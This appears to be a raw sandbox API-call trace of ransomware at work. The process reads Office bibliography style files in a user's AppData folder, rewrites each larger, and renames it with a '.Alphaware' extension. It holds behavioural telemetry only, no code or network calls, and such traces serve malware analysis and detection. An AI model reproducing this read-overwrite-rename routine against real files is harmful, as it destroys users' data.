[0091.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0091.852] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\gb.xsl"), fInfoLevelId=0x0, lpFileInformation=0x24643b8 | out: lpFileInformation=0x24643b8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6ef779b0, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x4197e)) returned 1 [0091.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0091.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0091.852] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\gb.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0091.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0091.858] ReadFile (in: hFile=0x250, lpBuffer=0x12640ba8, nNumberOfBytesToRead=0x4197e, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x12640ba8*, lpNumberOfBytesRead=0x23e958*=0x4197e, lpOverlapped=0x0) returned 1 [0091.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0091.890] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\gb.xsl"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0091.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0091.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0091.902] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\gb.xsl"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x88f8a400, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x57820)) returned 1 [0091.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0091.902] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\gb.xsl"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\gb.xsl.alphaware")) returned 1 [0091.907] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL", dwFileAttributes=0x80) returned 1 [0091.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0091.907] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\gostname.xsl"), fInfoLevelId=0x0, lpFileInformation=0x2408568 | out: lpFileInformation=0x2408568*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6ef05590, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x3e966)) returned 1 [0091.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0091.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0091.907] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\gostname.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0091.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0091.908] ReadFile (in: hFile=0x250, lpBuffer=0x129284f0, nNumberOfBytesToRead=0x3e966, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x129284f0*, lpNumberOfBytesRead=0x23e958*=0x3e966, lpOverlapped=0x0) returned 1 [0091.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0091.942] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\gostname.xsl"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0091.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0091.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0091.952] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\gostname.xsl"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x89022980, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x53808)) returned 1 [0091.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0091.953] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\gostname.xsl"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\gostname.xsl.alphaware")) returned 1 [0091.953] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL", dwFileAttributes=0x80) returned 1 [0091.955] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0091.955] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\gosttitle.xsl"), fInfoLevelId=0x0, lpFileInformation=0x23cb700 | out: lpFileInformation=0x23cb700*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6ef05590, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x3d639)) returned 1 [0091.956] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0091.956] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0091.956] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\gosttitle.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0091.956] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0091.956] ReadFile (in: hFile=0x250, lpBuffer=0x128890f0, nNumberOfBytesToRead=0x3d639, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x128890f0*, lpNumberOfBytesRead=0x23e958*=0x3d639, lpOverlapped=0x0) returned 1 [0091.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0091.987] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\gosttitle.xsl"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0091.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0091.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0091.997] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\gosttitle.xsl"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x8906ec40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x51e74)) returned 1 [0091.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0091.997] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\gosttitle.xsl"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\gosttitle.xsl.alphaware")) returned 1 [0091.998] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl", dwFileAttributes=0x80) returned 1 [0091.998] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0091.998] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\harvardanglia2008officeonline.xsl"), fInfoLevelId=0x0, lpFileInformation=0x244ae20 | out: lpFileInformation=0x244ae20*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6ef779b0, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x45882)) returned 1 [0091.998] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0091.999] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0091.999] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\harvardanglia2008officeonline.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0091.999] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0092.007] ReadFile (in: hFile=0x250, lpBuffer=0x12640ba8, nNumberOfBytesToRead=0x45882, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x12640ba8*, lpNumberOfBytesRead=0x23e958*=0x45882, lpOverlapped=0x0) returned 1 [0092.037] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0092.037] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\harvardanglia2008officeonline.xsl"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0092.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0092.057] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0092.057] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\harvardanglia2008officeonline.xsl"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x891071c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5cc34)) returned 1 [0092.057] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0092.057] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\harvardanglia2008officeonline.xsl"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\harvardanglia2008officeonline.xsl.alphaware")) returned 1 [0092.059] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl", dwFileAttributes=0x80) returned 1 [0092.059] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0092.059] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\ieee2006officeonline.xsl"), fInfoLevelId=0x0, lpFileInformation=0x24446e0 | out: lpFileInformation=0x24446e0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6fac6230, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x47e7d)) returned 1 [0092.059] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0092.059] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0092.059] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\ieee2006officeonline.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0092.060] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0092.069] ReadFile (in: hFile=0x250, lpBuffer=0x12640ba8, nNumberOfBytesToRead=0x47e7d, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x12640ba8*, lpNumberOfBytesRead=0x23e958*=0x47e7d, lpOverlapped=0x0) returned 1 [0092.098] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0092.098] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\ieee2006officeonline.xsl"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0092.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0092.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0092.111] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\ieee2006officeonline.xsl"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x8919f740, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5fec8)) returned 1 [0092.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0092.111] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\ieee2006officeonline.xsl"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\ieee2006officeonline.xsl.alphaware")) returned 1 [0092.112] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL", dwFileAttributes=0x80) returned 1 [0092.113] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0092.113] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690.xsl"), fInfoLevelId=0x0, lpFileInformation=0x2409260 | out: lpFileInformation=0x2409260*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6fa2dcb0, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x42132)) returned 1 [0092.113] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0092.113] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0092.113] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0092.113] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0092.113] ReadFile (in: hFile=0x250, lpBuffer=0x1296fd90, nNumberOfBytesToRead=0x42132, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x1296fd90*, lpNumberOfBytesRead=0x23e958*=0x42132, lpOverlapped=0x0) returned 1 [0092.150] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0092.150] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690.xsl"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0092.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0092.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0092.162] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690.xsl"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x89211b60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x58274)) returned 1 [0092.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0092.162] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690.xsl"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690.xsl.alphaware")) returned 1 [0092.163] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL", dwFileAttributes=0x80) returned 1 [0092.167] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0092.167] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690nmerical.xsl"), fInfoLevelId=0x0, lpFileInformation=0x23cbce8 | out: lpFileInformation=0x23cbce8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6fa2dcb0, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x351ea)) returned 1 [0092.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0092.167] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0092.167] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690nmerical.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0092.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0092.167] ReadFile (in: hFile=0x250, lpBuffer=0x128ebb48, nNumberOfBytesToRead=0x351ea, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x128ebb48*, lpNumberOfBytesRead=0x23e958*=0x351ea, lpOverlapped=0x0) returned 1 [0092.211] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0092.211] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690nmerical.xsl"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0092.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0092.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0092.221] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690nmerical.xsl"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x892aa0e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x46e08)) returned 1 [0092.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0092.221] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690nmerical.xsl"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL.Alphaware" (normalized: 